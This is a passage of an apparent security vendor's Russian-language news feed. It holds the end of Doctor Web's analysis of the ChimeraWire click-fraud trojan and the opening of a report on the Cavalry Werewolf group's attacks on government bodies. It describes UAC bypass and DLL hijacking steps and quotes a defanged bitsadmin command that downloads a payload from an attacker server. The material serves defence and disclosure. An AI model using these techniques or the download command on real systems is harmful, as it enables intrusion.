&lt;p&gt;Затем он вносит патч в копию системной библиотеки &lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;. Для этого &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла &lt;span class="string"&gt;dropper&lt;/span&gt; в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; и измененной библиотеки. Если инициализация проходит успешно, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.&lt;/p&gt;

&lt;p&gt;В случае успеха модифицированная библиотека &lt;span class="string"&gt;dropper&lt;/span&gt; копируется в каталог &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; в виде файла &lt;span class="string"&gt;ATL.dll&lt;/span&gt;. После этого &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; запускает системную оснастку управления WMI &lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении &lt;span class="string"&gt;mmc.exe&lt;/span&gt;, которое автоматически загружает библиотеку &lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt; с патчем. Она, в свою очередь, повторно запускает &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, но уже с правами администратора.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; при отсутствии прав администратора&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;При запуске от имени администратора &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив &lt;span class="string"&gt;one.zip&lt;/span&gt;. В нем находятся файлы, аналогичные файлам из архива &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; из первой цепочки (в частности, легитимная программа &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; и вредоносная библиотека &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; распаковывает архив и в системном планировщике создает задачу на автозапуск &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;. Далее цепочка заражения повторяет первый сценарий.&lt;/p&gt;

&lt;p&gt;При этом &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; скачивает и второй ZIP-архив: &lt;span class="string"&gt;two.zip&lt;/span&gt;. В нем находится вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; (&lt;span class="string"&gt;update.py&lt;/span&gt;), а также файлы, необходимые для его запуска. Среди них — &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; — переименованный консольный интерпретатор языка Python &lt;span class="string"&gt;pythonw.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; создает в системном планировщике задачу на автозапуск &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; в целевые системы.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; с правами администратора&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.&lt;/blockquote&gt;

&lt;p&gt;Попадая на целевой компьютер, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; скачивает со стороннего сайта ZIP-архив &lt;span class="string"&gt;chrome-win.zip&lt;/span&gt; с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После скачивания браузера &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.&lt;/p&gt;

&lt;p&gt;Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример конфигурации, которую трояну передает C2-сервер&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В ней находятся задания и связанные с ними параметры:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;целевая поисковая система (поддерживаются системы Google и Bing);&lt;/li&gt;
    &lt;li&gt;ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;&lt;/li&gt;
    &lt;li&gt;максимальное количество последовательных переходов по веб-страницам;&lt;/li&gt;
    &lt;li&gt;случайные распределения для выполнения автоматических кликов на веб-страницах;&lt;/li&gt;
    &lt;li&gt;время ожидания загрузки страниц;&lt;/li&gt;
    &lt;li&gt;целевые домены.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.&lt;/p&gt;

&lt;h3&gt;Имитация кликов мышью пользователем&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; способен выполнять клики следующих видов:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;для навигации по поисковой выдаче;&lt;/li&gt;
    &lt;li&gt;для открытия найденных релевантных ссылок в новых фоновых вкладках.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Вначале &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.&lt;/p&gt;

&lt;p&gt;Затем &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.&lt;/p&gt;

&lt;p&gt;Если на странице было выявлено достаточное количество подходящих ссылок, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.&lt;/p&gt;

&lt;p&gt;Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; определяет количество ссылок, по которым необходимо перейти. Например, распределение &lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt; означает, что &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.&lt;/p&gt;

&lt;p&gt;После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.&lt;/p&gt;

&lt;p&gt;Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Подробные технические описания трояна &lt;b&gt;ChimeraWire&lt;/b&gt; и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;

&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; 
&lt;/p&gt;

&lt;h3&gt;Заключение&lt;/h3&gt;

&lt;p&gt;В настоящее время вредоносная деятельность &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).&lt;/p&gt;

&lt;p&gt;Таким образом, в будущем возможно появление новых версий &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;Вредоносный файл (T1204.002)&lt;br /&gt;&lt;br /&gt;Вредоносная библиотека (T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Планировщик заданий Windows (T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;Запланированная задача / задание (T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;br /&gt;&lt;br /&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;Зашифрованный / закодированный файл (T1027.013)&lt;br /&gt;&lt;br /&gt;Уклонение от отладки (T1622)&lt;br /&gt;&lt;br /&gt;Скрытое окно (T1564.003)&lt;br /&gt;&lt;br /&gt;Исключения для файла или пути (T1564.012)&lt;br /&gt;&lt;br /&gt;Деобфускация / декодирование файлов или данных (T1140)&lt;br /&gt;&lt;br /&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Двусторонняя связь (T1102.002)&lt;br /&gt;&lt;br /&gt;Веб-протоколы (T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15078&amp;lng=kk</guid><title>Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения</title><link>https://news.drweb.kz/show/?i=15078&amp;lng=kk&amp;c=23</link><pubDate>Thu, 06 Nov 2025 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;6 ноября 2025 года&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Введение&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.&lt;/p&gt;
&lt;p&gt;В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.&lt;/p&gt;
&lt;h3&gt;Общие сведения об атаке и используемые инструменты&lt;/h3&gt;
&lt;p&gt;Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;, который основан на ПО с открытым кодом &lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt;. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Варианты имен файлов BackDoor.ShellNET.1&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Пример фишингового письма с &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Используя &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Первой из угроз, загруженных через &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, была троянская программа-стилер &lt;a href="https://vms.drweb.kz/search/?q=Trojan.FileSpyNET.5&amp;lng=kk"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).&lt;/p&gt;
&lt;p&gt;Затем атакующие установили бэкдор &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Tunnel.41&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt; (представляет собой ПО с открытым исходным кодом &lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.&lt;/p&gt;
&lt;h3&gt;Инструменты Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.&lt;/p&gt;
&lt;h3&gt;Точка входа&lt;/h3&gt;
&lt;p&gt;Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;скрипты (&lt;a href="https://vms.drweb.kz/search/?q=BAT.DownLoader.1138&amp;lng=kk"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;исполняемые файлы (&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Siggen2.5463&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.RShell.169&amp;lng=kk"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseShell.10&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор &lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt;. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BAT.DownLoader.1138&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
